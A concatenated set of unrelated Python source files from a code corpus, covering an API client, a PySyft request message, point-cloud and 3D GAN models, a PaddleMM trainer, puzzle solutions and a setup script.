    def get_member_events(self, id, member_id, start_date=None):
        """
        Get a team member's events

        See
        http://docs.teambition.com/wiki/teams#teams-get-team-member-events

        :param id: team ID
        :param member_id: member ID
        :param start_date: optional, start date; defaults to the start of the current week
        :return: parsed JSON response
        """
        params = optionaldict(startDate=start_date)
        return self._get(
            'api/teams/{0}/members/{1}/events'.format(id, member_id),
            params=params
        )

    def get_tasks(self, id, start_date=None):
        """
        Get the team's weekly tasks

        See
        http://docs.teambition.com/wiki/teams#teams-get-team-week-tasks

        :param id: team ID
        :param start_date: optional, start date; defaults to the start of the current week
        :return: parsed JSON response
        """
        params = optionaldict(startDate=start_date)
        return self._get(
            'api/teams/{0}/tasks'.format(id),
            params=params
        )

    def get_events(self, id, start_date=None):
        """
        Get the team's weekly events

        See
        http://docs.teambition.com/wiki/teams#teams-get-team-week-events

        :param id: team ID
        :param start_date: optional, start date; defaults to the start of the current week
        :return: parsed JSON response
        """
        params = optionaldict(startDate=start_date)
        return self._get(
            'api/teams/{0}/events'.format(id),
            params=params
        )
1677832 | # stdlib
from enum import Enum
from typing import List
from typing import Optional
# third party
from google.protobuf.reflection import GeneratedProtocolMessageType
from nacl.signing import VerifyKey
# relative
from ...... import deserialize
from ...... import serialize
from ......logger import critical
from ......logger import debug
from ......logger import traceback
from ......logger import traceback_and_raise
from ......proto.core.node.domain.service.request_message_pb2 import (
RequestMessage as RequestMessage_PB,
)
from .....common import UID
from .....common.message import ImmediateSyftMessageWithoutReply
from .....common.serde.serializable import serializable
from .....io.address import Address
from ...client import Client
from ...node import Node
from ..accept_or_deny_request.accept_or_deny_request_messages import (
AcceptOrDenyRequestMessage,
)
class RequestStatus(Enum):
    """Lifecycle states of a request."""
    # Values are fixed integers; presumably relied on for serialization --
    # do not renumber without verifying wire compatibility.
    Pending = 1
    Rejected = 2
    Accepted = 3
# TODO: this message conflates Message functionality with Manager/Request_API functionality
# TODO: this needs to be split into two separate pieces of functionality.
@serializable()
class RequestMessage(ImmediateSyftMessageWithoutReply):
    """A request for access to a remote object, sent to the owner's node.

    Carries the requester's verify key, the target object id, and display
    metadata; the instance can also dispatch its own accept/deny follow-up
    message via ``send_msg`` (see the module-level TODO about this mixing
    of message and manager responsibilities).
    """

    # NOTE(review): only three names are slotted here, "name" is never
    # assigned, and __init__ sets many more attributes -- the base class
    # presumably provides a __dict__, so this list is informational only.
    __slots__ = ["name", "request_description", "request_id"]

    def __init__(
        self,
        object_id: UID,
        address: Address,
        requester_verify_key: VerifyKey,
        owner_address: Address,
        status: Optional[str] = "",
        request_type: Optional[str] = "",
        date: Optional[str] = "",
        object_tags: Optional[List[str]] = None,
        object_type: str = "",
        request_description: str = "",
        request_id: Optional[UID] = None,
        owner_client_if_available: Optional[Client] = None,
        destination_node_if_available: Optional[Node] = None,
        timeout_secs: Optional[int] = None,
        requested_budget: Optional[float] = 0.0,
        current_budget: Optional[float] = 0.0,
        user_name: Optional[str] = "",
        user_role: Optional[str] = "",
        user_email: Optional[str] = "",
    ):
        """Build a request; a fresh ``request_id`` is generated when omitted.

        The request id doubles as the message id passed to the parent.
        """
        if request_id is None:
            request_id = UID()
        super().__init__(address=address, msg_id=request_id)
        self.object_tags = object_tags if object_tags else []
        self.object_type = object_type
        self.request_description = request_description
        self.request_id = request_id
        self.requester_verify_key = requester_verify_key
        self.object_id = object_id
        self.owner_address = owner_address
        self.owner_client_if_available = owner_client_if_available
        self.destination_node_if_available = destination_node_if_available
        self.timeout_secs = timeout_secs
        # Set later via set_arrival_time(); deliberately never serialized.
        self._arrival_time: Optional[float] = None
        self.status: Optional[str] = status
        self.date: Optional[str] = date
        self.request_type: Optional[str] = request_type
        self.user_name: Optional[str] = user_name
        self.user_email: Optional[str] = user_email
        self.user_role: Optional[str] = user_role
        self.requested_budget: float = requested_budget  # type: ignore
        self.current_budget: float = current_budget  # type: ignore

    def accept(self) -> None:
        """Send an acceptance for this request."""
        self.send_msg(accept=True)

    def approve(self) -> None:
        """Alias for :meth:`accept`."""
        self.accept()

    def grant(self) -> None:
        """Alias for :meth:`accept`."""
        self.accept()

    def deny(self) -> None:
        """Send a denial for this request."""
        self.send_msg(accept=False)

    def send_msg(self, accept: bool) -> None:
        """Dispatch an Accept/Deny follow-up message for this request.

        Prefers the owner's client when available; otherwise processes the
        message directly on the destination node using the node's root
        verify key. Raises if neither dispatch path is available.
        """
        action_name = "Accept" if accept else "Deny"
        if self.owner_client_if_available is not None:
            msg = AcceptOrDenyRequestMessage(
                address=self.owner_client_if_available.address,
                accept=accept,
                request_id=self.id,
            )
            self.owner_client_if_available.send_immediate_msg_without_reply(msg=msg)
        elif self.destination_node_if_available is not None:
            msg = AcceptOrDenyRequestMessage(
                address=self.destination_node_if_available.address,
                accept=accept,
                request_id=self.id,
            )
            try:
                # Route to the node's local service instead of sending over
                # the network.
                node = self.destination_node_if_available
                router = node.immediate_msg_without_reply_router
                service = router[type(msg)]
                service.process(
                    node=self.destination_node_if_available,
                    msg=msg,
                    verify_key=self.destination_node_if_available.root_verify_key,
                )
            except Exception as e:
                traceback(e)
                critical(f"Tried to {action_name} Message on Node. {e}")
            debug(f"{action_name} Request: " + str(self.id))
        else:
            log = f"No way to dispatch {action_name} Message."
            critical(log)
            traceback_and_raise(Exception(log))

    def reject(self) -> None:
        """Alias for :meth:`deny`."""
        self.deny()

    def withdraw(self) -> None:
        """Alias for :meth:`deny`."""
        self.deny()

    @property
    def arrival_time(self) -> Optional[float]:
        """Time the request arrived at its destination (or None if unset)."""
        return self._arrival_time

    def set_arrival_time(self, arrival_time: float) -> None:
        # used to expire requests as their destination, this should never be serialized
        if self._arrival_time is None:
            self._arrival_time = arrival_time

    def _object2proto(self) -> RequestMessage_PB:
        """Serialize this request into its protobuf representation."""
        msg = RequestMessage_PB()
        msg.object_tags.extend(self.object_tags)
        msg.object_type = self.object_type
        msg.status = self.status
        msg.request_type = self.request_type
        msg.date = self.date
        msg.user_name = self.user_name
        msg.user_email = self.user_email
        msg.user_role = self.user_role
        msg.requested_budget = self.requested_budget if self.requested_budget else 0.0
        msg.current_budget = self.current_budget if self.current_budget else 0.0
        msg.request_description = self.request_description
        msg.request_id.CopyFrom(serialize(obj=self.request_id))
        msg.target_address.CopyFrom(serialize(obj=self.address))
        msg.object_id.CopyFrom(serialize(obj=self.object_id))
        msg.owner_address.CopyFrom(serialize(obj=self.owner_address))
        msg.requester_verify_key = bytes(self.requester_verify_key)
        # -1 will represent no timeout, where as 0 is a valid value for timing out
        # immediately after checking if there is a rule in place to accept or deny
        if self.timeout_secs is None or self.timeout_secs < 0:
            self.timeout_secs = -1
        msg.timeout_secs = int(self.timeout_secs)
        return msg

    @staticmethod
    def _proto2object(proto: RequestMessage_PB) -> "RequestMessage":
        """Deserialize a protobuf message back into a RequestMessage."""
        request_msg = RequestMessage(
            request_id=deserialize(blob=proto.request_id),
            status=proto.status,
            request_type=proto.request_type,
            date=proto.date,
            object_tags=proto.object_tags,
            object_type=proto.object_type,
            user_name=proto.user_name,
            user_email=proto.user_email,
            user_role=proto.user_role,
            requested_budget=proto.requested_budget,
            current_budget=proto.current_budget,
            request_description=proto.request_description,
            address=deserialize(blob=proto.target_address),
            object_id=deserialize(blob=proto.object_id),
            owner_address=deserialize(blob=proto.owner_address),
            requester_verify_key=VerifyKey(proto.requester_verify_key),
            timeout_secs=proto.timeout_secs,
        )
        # NOTE(review): looks redundant -- request_id was already passed to
        # the constructor above; confirm before removing.
        request_msg.request_id = deserialize(blob=proto.request_id)
        return request_msg

    @staticmethod
    def get_protobuf_schema() -> GeneratedProtocolMessageType:
        """Protobuf schema backing this message type."""
        return RequestMessage_PB
| StarcoderdataPython |
1633036 | <reponame>ada-shen/utility
import os
import sys
import tensorflow as tf
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.append(BASE_DIR)
sys.path.append(os.path.join(BASE_DIR, 'models'))
sys.path.append(os.path.join(BASE_DIR, 'tf_utils'))
import tf_util
from pointSIFT_util import pointSIFT_module, pointSIFT_res_module, pointnet_fp_module, pointnet_sa_module, pointSIFT_nores_module
def placeholder_inputs(batch_size, num_point):
    """TF1 input placeholders: (B, N, 3) point clouds and per-cloud int labels."""
    pointclouds_pl = tf.placeholder(tf.float32, shape=(batch_size, num_point, 3))
    # NOTE(review): shape=(batch_size) is an int, not the 1-tuple
    # (batch_size,) -- verify tf.placeholder treats it as rank-1 as intended.
    labels_pl = tf.placeholder(tf.int32, shape=(batch_size))
    # smpws_pl = tf.placeholder(tf.float32, shape=(batch_size, num_point))
    return pointclouds_pl, labels_pl
def get_model(point_cloud, is_training, num_class, bn_decay=None, feature=None):
    """Classification network built from pointSIFT + PointNet++ SA layers.

    Input is B x N x 3 point clouds; output is B x num_class logits (the
    final SA layer uses group_all=True global pooling and the FC head is
    squeezed to one prediction per cloud -- i.e. whole-cloud classification,
    despite the original "semantic segmentation" description).
    """
    batch_size = point_cloud.get_shape()[0].value  # NOTE(review): unused below
    end_points = {}  # returned empty; kept for interface compatibility
    l0_xyz = point_cloud
    l0_points = feature
    # end_points['l0_xyz'] = l0_xyz
    ### without res module part###
    # Alternate pointSIFT orientation-encoding and set-abstraction layers,
    # downsampling N -> 1024 -> 256 -> 64 -> 1 (global) points.
    c0_l0_xyz, c0_l0_points, c0_l0_indices = pointSIFT_nores_module(l0_xyz, l0_points, radius=0.1, out_channel=64, is_training=is_training, bn_decay=bn_decay, scope='layer0_c0', merge='concat')
    l1_xyz, l1_points, l1_indices = pointnet_sa_module(c0_l0_xyz, c0_l0_points, npoint=1024, radius=0.1, nsample=32, mlp=[64,128], mlp2=None, group_all=False, is_training=is_training, bn_decay=bn_decay, scope='layer1')
    c0_l1_xyz, c0_l1_points, c0_l1_indices = pointSIFT_nores_module(l1_xyz, l1_points, radius=0.25, out_channel=128, is_training=is_training, bn_decay=bn_decay, scope='layer1_c0')
    l2_xyz, l2_points, l2_indices = pointnet_sa_module(c0_l1_xyz, c0_l1_points, npoint=256, radius=0.2, nsample=32, mlp=[128,256], mlp2=None, group_all=False, is_training=is_training, bn_decay=bn_decay, scope='layer2')
    c0_l2_xyz, c0_l2_points, c0_l2_indices = pointSIFT_nores_module(l2_xyz, l2_points, radius=0.5, out_channel=256, is_training=is_training, bn_decay=bn_decay, scope='layer2_c0')
    l3_xyz, l3_points, l3_indices = pointnet_sa_module(c0_l2_xyz, c0_l2_points, npoint=64, radius=0.4, nsample=32, mlp=[256,512], mlp2=None, group_all=False, is_training=is_training, bn_decay=bn_decay, scope='layer3')
    c0_l3_xyz, c0_l3_points, c0_l3_indices = pointSIFT_nores_module(l3_xyz, l3_points, radius=0.85, out_channel=512, is_training=is_training, bn_decay=bn_decay, scope='layer3_c0')
    l4_xyz, l4_points, l4_indices = pointnet_sa_module(c0_l3_xyz, c0_l3_points, npoint=None, radius=None, nsample=None, mlp=[512,1024], mlp2=None, group_all=True, is_training=is_training, bn_decay=bn_decay, scope='layer4')
    # FC layers
    net = tf_util.conv1d(l4_points, 512, 1, padding='VALID', bn=True, is_training=is_training, scope='fc1', bn_decay=bn_decay)
    net = tf_util.dropout(net, keep_prob=0.7, is_training=is_training, scope='dp1')
    net = tf_util.conv1d(net, 256, 1, padding='VALID', bn=True, is_training=is_training, scope='fc2', bn_decay=bn_decay)
    net = tf_util.dropout(net, keep_prob=0.7, is_training=is_training, scope='dp2')
    net = tf_util.conv1d(net, num_class, 1, padding='VALID', activation_fn=None, scope='fc3')
    net = tf.squeeze(net)
    return net, end_points
def get_loss(pred, label):
    """Mean softmax cross-entropy over the batch.

    Also records the loss as a 'classify loss' summary scalar and adds it
    to the 'losses' collection as side effects.

    :param pred: per-example class logits
    :param label: integer class labels
    :return: scalar mean classification loss tensor
    """
    per_example = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=label, logits=pred)
    mean_loss = tf.reduce_mean(per_example)
    tf.summary.scalar('classify loss', mean_loss)
    tf.add_to_collection('losses', mean_loss)
    return mean_loss
| StarcoderdataPython |
3352059 | <gh_stars>1-10
import sys
sys.path.append('..')  # make the sibling `intcode` package importable
from intcode.intcode import IntCodeComputer

# Hull grid is (2*GRID_RADIUS) x (2*GRID_RADIUS); the robot starts centred.
GRID_RADIUS = 100
# Panel colours as consumed/emitted by the Intcode program.
BLACK = 0
WHITE = 1
# Turn commands output by the program.
LEFT = 0
RIGHT = 1
# Direction vectors (dx, dy), clockwise from up (y grows downward).
# Left moves left through array and vice versa.
AROUND = [(0, -1), (1, 0), (0, 1), (-1, 0)]
class HullPaintingRobot:
    """Intcode-driven hull-painting robot (Advent of Code 2019, day 11).

    Each cycle the robot feeds the colour of the panel under it to the
    Intcode program, which answers with a colour to paint and a direction
    to turn; the robot then advances one panel.
    """

    def __init__(self, start_on_white=False, program_path='input'):
        """Load the Intcode program and set up an all-black grid.

        :param start_on_white: paint the starting panel white first (part 2).
        :param program_path: file holding the comma-separated program
            (generalised; defaults to the previously hard-coded 'input').
        """
        # Fix: use a context manager so the program file is closed promptly
        # (the original left the handle from open('input') unclosed).
        with open(program_path) as program_file:
            self.ic = IntCodeComputer([int(m) for m in program_file.readline().split(',')])
        self.ic.debugging = False
        self.painted = []
        self.grid = []
        for y in range(0, 2 * GRID_RADIUS):
            self.grid.append([BLACK] * (GRID_RADIUS * 2))
            self.painted.append([False] * (GRID_RADIUS * 2))
        self.pos = (GRID_RADIUS, GRID_RADIUS)
        if start_on_white:
            self.grid[self.pos[1]][self.pos[0]] = WHITE
        self.direction_index = 0  # index into AROUND; starts facing up

    def print_grid(self):
        """Dump the grid to stdout ('*' = white, ' ' = black)."""
        for y in range(0, len(self.grid)):
            line = ''
            for num in self.grid[y]:
                if num == BLACK:
                    line += ' '
                else:
                    line += '*'
            print(line)

    def paint_until_halt(self):
        """Run the program to completion, painting and moving each cycle;
        then report how many panels were painted at least once (part 1)."""
        while not self.ic.halted:
            (x, y) = self.pos
            [to_paint, turn_direction] = self.step(self.grid[y][x])
            self.grid[y][x] = to_paint
            self.painted[y][x] = True
            # Turn 90 degrees: LEFT steps backwards through AROUND, RIGHT forwards.
            self.direction_index += -1 if LEFT == turn_direction else 1
            self.direction_index = (self.direction_index + 4) % 4
            # Consistency fix: keep pos a tuple (it starts as one in __init__).
            self.pos = (self.pos[0] + AROUND[self.direction_index][0],
                        self.pos[1] + AROUND[self.direction_index][1])
        num_painted = sum(row.count(True) for row in self.painted)
        print('Painted at least once: %d' % (num_painted))

    def step(self, over_color):
        """Feed the current panel colour to the program; return its two
        outputs [colour_to_paint, turn_direction]."""
        assert len(self.ic.inputs) == 0
        self.ic.inputs = [over_color]
        # Run until exactly one (colour, turn) pair has been produced.
        while len(self.ic.outputs) != 2:
            self.ic.step()
        ret = self.ic.outputs
        self.ic.outputs = []
        return ret
| StarcoderdataPython |
127977 | <filename>setup.py<gh_stars>1-10
from setuptools import setup, find_packages
# Package metadata for pyclics-clustering (a pyclics plugin).
setup(
    name='pyclics-clustering',
    version='1.0.1.dev0',
    description="clustering algorithms for CLICS networks",
    # NOTE(review): the README file handle is never closed.
    long_description=open("README.md").read(),
    long_description_content_type='text/markdown',
    author='<NAME> and <NAME>',
    author_email='<EMAIL>',
    url='https://github.com/clics/pyclics-clustering',
    classifiers=[
        'Development Status :: 4 - Beta',
        'Intended Audience :: Science/Research',
        'Operating System :: OS Independent',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
    ],
    # src/ layout: packages live under src/.
    packages=find_packages(where='src'),
    package_dir={'': 'src'},
    include_package_data=True,
    zip_safe=False,
    python_requires='>=3.5',
    install_requires=[
        'attrs>=18.2',
        'python-louvain',
        'networkx==2.1',
        'pyclics>=2.0.0',
    ],
    extras_require={
        'dev': [
            'tox',
            'flake8',
            'wheel',
            'twine',
        ],
        'test': [
            'mock',
            'pytest>=3.6',
            'pytest-mock',
            'pytest-cov',
            'coverage>=4.2',
        ],
    },
    # Registers this package as a clics plugin via its includeme hook.
    entry_points={
        'clics.plugin': ['clustering=pyclics_clustering:includeme'],
    },
)
1724582 | <reponame>rootulp/exercism<filename>python/beer-song/beer.py
class Beer:
    """Builds verses of the '99 Bottles of Beer' song."""

    LAST_LINE = ('Go to the store and buy some more, '
                 '99 bottles of beer on the wall.')

    @classmethod
    def song(cls, start, stop):
        """All verses from ``start`` down to ``stop``, newline-joined."""
        verses = [cls.verse(n) for n in range(start, stop - 1, -1)]
        return "\n".join(verses) + "\n"

    @classmethod
    def verse(cls, verse_num):
        """One full verse: opening line plus action line."""
        return cls.prefix(verse_num) + "\n" + cls.suffix(verse_num) + "\n"

    @classmethod
    def prefix(cls, verse_num):
        """Opening line, capitalised ('No more ...' for verse 0)."""
        qty = cls.quantity(verse_num)
        unit = cls.container(verse_num)
        opening = '{0} {1} of beer on the wall, {0} {1} of beer.'.format(qty, unit)
        return opening.capitalize()

    @classmethod
    def suffix(cls, verse_num):
        """Action line; verse 0 sends the listener back to the store."""
        if verse_num == 0:
            return cls.LAST_LINE
        prev = verse_num - 1
        return ('Take {0} down and pass it around, '
                '{1} {2} of beer on the wall.'.format(
                    cls.cardinality(prev), cls.quantity(prev), cls.container(prev)))

    @staticmethod
    def quantity(num):
        """'no more' at zero, otherwise the number as a string."""
        if num == 0:
            return 'no more'
        return str(num)

    @staticmethod
    def container(num):
        """Singular 'bottle' only for exactly one."""
        return 'bottle' if num == 1 else 'bottles'

    @staticmethod
    def cardinality(num):
        """'it' for the final bottle, 'one' otherwise."""
        if num == 0:
            return 'it'
        return 'one'
def verse(verse_num):
    """Module-level convenience wrapper for ``Beer.verse``."""
    return Beer.verse(verse_num)
def song(start, stop=0):
    """Module-level wrapper for ``Beer.song``; ``stop`` defaults to 0."""
    return Beer.song(start, stop)
| StarcoderdataPython |
1709147 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
from tqdm import tqdm
from abc import ABCMeta, abstractmethod
import paddle
import paddle.nn as nn
from paddle.io import DataLoader
from paddlemm.models import CMML, NIC, SCAN, SGRAF, AoANet, EarlyFusion, LateFusion, LMFFusion, TMCFusion, VSEPP, IMRAM
from paddlemm.datasets import BasicDataset, SemiDataset, PretrainDataset, SampleDataset
# Maps the config's `data_mode` string to the Dataset class used by trainers.
DatasetMap = {
    'basic': BasicDataset,
    'semi': SemiDataset,
    'sample': SampleDataset,
    'pretrain': PretrainDataset
}
# Maps the lower-cased `model_name` string to the corresponding model class.
ModelMap = {
    'cmml': CMML,
    'nic': NIC,
    'scan': SCAN,
    'vsepp': VSEPP,
    'imram': IMRAM,
    'sgraf': SGRAF,
    'aoanet': AoANet,
    'earlyfusion': EarlyFusion,
    'latefusion': LateFusion,
    'lmffusion': LMFFusion,
    'tmcfusion': TMCFusion
}
class BaseTrainer(metaclass=ABCMeta):
    """Abstract multimodal training loop for PaddleMM.

    Builds dataset, model, optimizer and (optionally) an LR scheduler from
    ``opt`` and drives the epoch loop; subclasses supply :meth:`evaluate`
    and :meth:`test`.

    NOTE(review): ``self.best_loss`` / ``self.best_score`` are read in
    :meth:`train` but never initialized here -- presumably set by a subclass
    before training; confirm, otherwise the first validation raises
    AttributeError.
    """
    def __init__(self, opt):
        # ``opt`` is assumed to support attribute access, dict-style .get()
        # and ** unpacking (addict/EasyDict-like object) -- TODO confirm.
        self.model_name = opt.model_name.lower()
        self.out_root = opt.out_root
        self.logger = opt.logger
        self.num_epochs = opt.num_epochs
        self.batch_size = opt.batch_size
        self.learning_rate = opt.learning_rate
        self.task = opt.task
        self.weight_decay = opt.get('weight_decay', 0.)
        self.pretrain_epochs = opt.get('pretrain_epochs', 0)
        self.num_workers = opt.get('num_workers', 0)
        self.val_epoch = opt.get('val_epoch', 1)
        # choose metric for select best model during training
        self.select_metric = opt.get('select_metric', 'loss')
        self.dataset = DatasetMap[opt.data_mode](**opt)
        # Expose vocabulary details to the model constructor via ``opt``.
        opt.vocab_size = self.dataset.vocab_size
        opt.vocab = str(self.dataset.word2idx)
        self.model = ModelMap[opt.model_name.lower()](**opt)
        self.grad_clip = opt.get('grad_clip', 0)
        if self.grad_clip:
            # Element-wise clipping to [-grad_clip, grad_clip].
            self.grad_clip = nn.clip.ClipGradByValue(opt.grad_clip)
        else:
            self.grad_clip = None
        self.step_size = opt.get('step_size', 0)
        self.gamma = opt.get('gamma', 0.1)
        if self.step_size:
            # Step decay: multiply the LR by ``gamma`` every ``step_size`` steps.
            self.scheduler = paddle.optimizer.lr.StepDecay(learning_rate=self.learning_rate, step_size=self.step_size,
                                                           gamma=self.gamma)
            self.optimizer = paddle.optimizer.Adam(parameters=self.model.parameters(),
                                                   learning_rate=self.scheduler,
                                                   weight_decay=self.weight_decay,
                                                   grad_clip=self.grad_clip)
        else:
            self.optimizer = paddle.optimizer.Adam(parameters=self.model.parameters(),
                                                   learning_rate=self.learning_rate,
                                                   weight_decay=self.weight_decay,
                                                   grad_clip=self.grad_clip)
    def train(self):
        """Run the main loop: optional pretrain, then train/validate/checkpoint."""
        if self.pretrain_epochs > 0:
            self.pretrain()
        for epoch in range(1, self.num_epochs + 1):
            all_loss = []
            self.model.train()
            train_loader = DataLoader(self.dataset.train_(),
                                      batch_size=self.batch_size,
                                      shuffle=True,
                                      num_workers=self.num_workers)
            train_tqdm = tqdm(train_loader(), ncols=80)
            for idx, batch in enumerate(train_tqdm):
                # The epoch index is injected so the model can schedule losses.
                batch['epoch'] = epoch
                loss = self.model(batch)
                loss.backward()
                self.optimizer.step()
                self.optimizer.clear_grad()
                all_loss.append(loss.item())
                train_tqdm.set_description("Epoch: {} | Loss: {:.3f}".format(epoch, loss.item()))
            train_tqdm.close()
            if self.step_size:
                self.scheduler.step()
            # Always keep the latest weights around for resuming.
            paddle.save(self.model.state_dict(), os.path.join(self.out_root, 'temp.pdparams'))
            if epoch % self.val_epoch == 0:
                val_res = self.evaluate()
                if self.select_metric == 'loss':
                    # Lower is better for loss.
                    if val_res['loss'] < self.best_loss:
                        self.best_loss = val_res['loss']
                        paddle.save(self.model.state_dict(), os.path.join(self.out_root, 'best_model.pdparams'))
                    self.logger.info("Epoch: {}, valid loss: {:.3f}, Best: {:.3f}".format(epoch, val_res['loss'], self.best_loss))
                else:
                    # Higher is better for any other selection metric.
                    if val_res[self.select_metric] > self.best_score:
                        self.best_score = val_res[self.select_metric]
                        paddle.save(self.model.state_dict(), os.path.join(self.out_root, 'best_model.pdparams'))
                    self.logger.info("Epoch: {}, valid score: {:.3f}, Best: {:.3f}".format(epoch, val_res[self.select_metric],
                                                                                          self.best_score))
    def pretrain(self):
        # for cmml pretraining
        self.model.train()
        for epoch in range(1, self.pretrain_epochs + 1):
            all_loss = []
            train_loader = DataLoader(self.dataset.train_(),
                                      batch_size=self.batch_size * 8,  # mul 8 to train total supervised data
                                      shuffle=True,
                                      num_workers=self.num_workers)
            train_tqdm = tqdm(train_loader(), ncols=80)
            for idx, batch in enumerate(train_tqdm):
                self.optimizer.clear_grad()
                loss = self.model.pretrain(batch)
                loss.backward()
                self.optimizer.step()
                all_loss.append(loss.item())
                train_tqdm.set_description("Pretrain epoch: {} | Loss: {:.3f}".format(epoch, np.mean(all_loss)))
    @abstractmethod
    def evaluate(self):
        """Validate the current model; must return a metrics dict (incl. 'loss')."""
        pass
    @abstractmethod
    def test(self):
        """Evaluate the best checkpoint on the test split."""
        pass
| StarcoderdataPython |
3365976 | <gh_stars>0
import numpy as np
import tensorflow as tf
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Input, Flatten, Conv3D, Conv3DTranspose, Dropout, ReLU, LeakyReLU, Concatenate, ZeroPadding3D
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.losses import MeanSquaredError
import tensorflow_addons as tfa
from tensorflow_addons.layers import InstanceNormalization
def Generator():
    '''
    Generator model.

    3D U-Net-style generator: a 4-channel 128^3 volume in, a 4-class softmax
    volume of the same spatial size out. Encoder/decoder levels are linked
    with skip connections via ``layers_to_concatenate``.
    '''
    def encoder_step(layer, Nf, ks, norm=True):
        # Strided conv halves each spatial dim; norm is skipped on the first
        # level (norm=False), as in pix2pix-style discriminator/generator nets.
        x = Conv3D(Nf, kernel_size=ks, strides=2, kernel_initializer='he_normal', padding='same')(layer)
        if norm:
            x = InstanceNormalization()(x)
        x = LeakyReLU()(x)
        x = Dropout(0.2)(x)
        return x
    def bottlenek(layer, Nf, ks):
        # NOTE: "bottlenek" [sic]. Dense-style bottleneck: four stride-1 conv
        # blocks whose raw conv outputs are concatenated back onto the stream.
        # NOTE(review): norm is applied to y and x rebuilt from it, then the
        # un-normalized y is concatenated back in -- confirm intended.
        x = Conv3D(Nf, kernel_size=ks, strides=2, kernel_initializer='he_normal', padding='same')(layer)
        x = InstanceNormalization()(x)
        x = LeakyReLU()(x)
        for i in range(4):
            y = Conv3D(Nf, kernel_size=ks, strides=1, kernel_initializer='he_normal', padding='same')(x)
            x = InstanceNormalization()(y)
            x = LeakyReLU()(x)
            x = Concatenate()([x, y])
        return x
    def decoder_step(layer, layer_to_concatenate, Nf, ks):
        # Transposed conv doubles each spatial dim, then merges the skip link.
        x = Conv3DTranspose(Nf, kernel_size=ks, strides=2, padding='same', kernel_initializer='he_normal')(layer)
        x = InstanceNormalization()(x)
        x = LeakyReLU()(x)
        x = Concatenate()([x, layer_to_concatenate])
        x = Dropout(0.2)(x)
        return x
    layers_to_concatenate = []
    inputs = Input((128,128,128,4), name='input_image')
    Nfilter_start = 64
    depth = 4
    ks = 4
    x = inputs
    # encoder
    for d in range(depth-1):
        if d==0:
            x = encoder_step(x, Nfilter_start*np.power(2,d), ks, False)
        else:
            x = encoder_step(x, Nfilter_start*np.power(2,d), ks)
        layers_to_concatenate.append(x)
    # bottlenek
    x = bottlenek(x, Nfilter_start*np.power(2,depth-1), ks)
    # decoder
    for d in range(depth-2, -1, -1):
        x = decoder_step(x, layers_to_concatenate.pop(), Nfilter_start*np.power(2,d), ks)
    # classifier
    last = Conv3DTranspose(4, kernel_size=ks, strides=2, padding='same', kernel_initializer='he_normal', activation='softmax', name='output_generator')(x)
    return Model(inputs=inputs, outputs=last, name='Generator')
def Discriminator():
    '''
    Discriminator model.

    PatchGAN-style conditional discriminator: concatenates the input and
    target 4-channel 128^3 volumes and outputs a single-channel patch map
    of real/fake scores.
    '''
    inputs = Input((128,128,128,4), name='input_image')
    targets = Input((128,128,128,4), name='target_image')
    Nfilter_start = 64
    depth = 3
    ks = 4
    def encoder_step(layer, Nf, norm=True):
        # Strided conv halves each spatial dim; norm skipped on first level.
        x = Conv3D(Nf, kernel_size=ks, strides=2, kernel_initializer='he_normal', padding='same')(layer)
        if norm:
            x = InstanceNormalization()(x)
        x = LeakyReLU()(x)
        x = Dropout(0.2)(x)
        return x
    x = Concatenate()([inputs, targets])
    for d in range(depth):
        if d==0:
            x = encoder_step(x, Nfilter_start*np.power(2,d), False)
        else:
            x = encoder_step(x, Nfilter_start*np.power(2,d))
    # Two padded valid convs shape the receptive field of the patch output.
    x = ZeroPadding3D()(x)
    x = Conv3D(Nfilter_start*(2**depth), ks, strides=1, padding='valid', kernel_initializer='he_normal')(x)
    x = InstanceNormalization()(x)
    x = LeakyReLU()(x)
    x = ZeroPadding3D()(x)
    last = Conv3D(1, ks, strides=1, padding='valid', kernel_initializer='he_normal', name='output_discriminator')(x)
    return Model(inputs=[targets, inputs], outputs=last, name='Discriminator')
def ensembler():
    """Build the 1-layer ensembling head: a (128,128,128,40) stack of
    candidate predictions in, a 4-class softmax volume out."""
    stacked = Input((128, 128, 128, 40))
    fused = Conv3D(
        4,
        kernel_size=3,
        kernel_initializer='he_normal',
        padding='same',
        activation='softmax',
    )(stacked)
    return Model(inputs=stacked, outputs=fused, name='Ensembler')
| StarcoderdataPython |
59298 | <reponame>6A/asmsq
from ..testsource import * # pylint: disable=W0614
class ArmTestSource(TestSource):
    """Test source yielding ARM instruction-encoding test cases."""

    @property
    def name(self) -> str:
        """Architecture identifier used by the test harness."""
        return 'arm'

    @property
    def test_cases(self) -> TestCases:
        """Yield every ARM encoding test case."""
        calls = [self.make_call('cps', 'Mode::USR')]
        expected = bytearray(b'\x10\x00\x02\xf1')
        yield TestCase('should encode single cps instruction', calls, expected)
3338878 | from mashcima import Mashcima
from mashcima.Sprite import Sprite
from mashcima.SpriteGroup import SpriteGroup
from mashcima.debug import show_images
from typing import List
import numpy as np
# mc = Mashcima([
# "CVC-MUSCIMA_W-01_N-10_D-ideal.xml",
# "CVC-MUSCIMA_W-01_N-14_D-ideal.xml",
# "CVC-MUSCIMA_W-01_N-19_D-ideal.xml",
#
# # "CVC-MUSCIMA_W-02_N-06_D-ideal.xml",
# # "CVC-MUSCIMA_W-02_N-13_D-ideal.xml",
# # "CVC-MUSCIMA_W-02_N-17_D-ideal.xml",
# ])
# Build the symbol repository from the CVC-MUSCIMA annotations, reusing the
# on-disk cache instead of the explicit XML list commented out above.
mc = Mashcima(use_cache=True)
def inspect(items: List):
    """Render Sprite/SpriteGroup items to images and show them 50 at a time."""
    page_size = 50
    page: List[np.ndarray] = []
    for idx, item in enumerate(items):
        # Both Sprite and SpriteGroup expose the same inspect() rendering.
        if isinstance(item, (Sprite, SpriteGroup)):
            page.append(item.inspect())
        if len(page) == page_size:
            print("Showing indices:", idx - page_size + 1, "-", idx, "/", len(items))
            show_images(page, row_length=10)
            page = []
    if len(page) != 0:
        # Flush the final partial page.
        print("Showing indices:", len(items) - len(page), "-", len(items) - 1, "/", len(items))
        show_images(page, row_length=10)
###############
# INSPECTIONS #
###############
# DEFAULT SYMBOL SAVING:
# import cv2, os
# s = mc.BREVE_RESTS[0].sprite("rest")
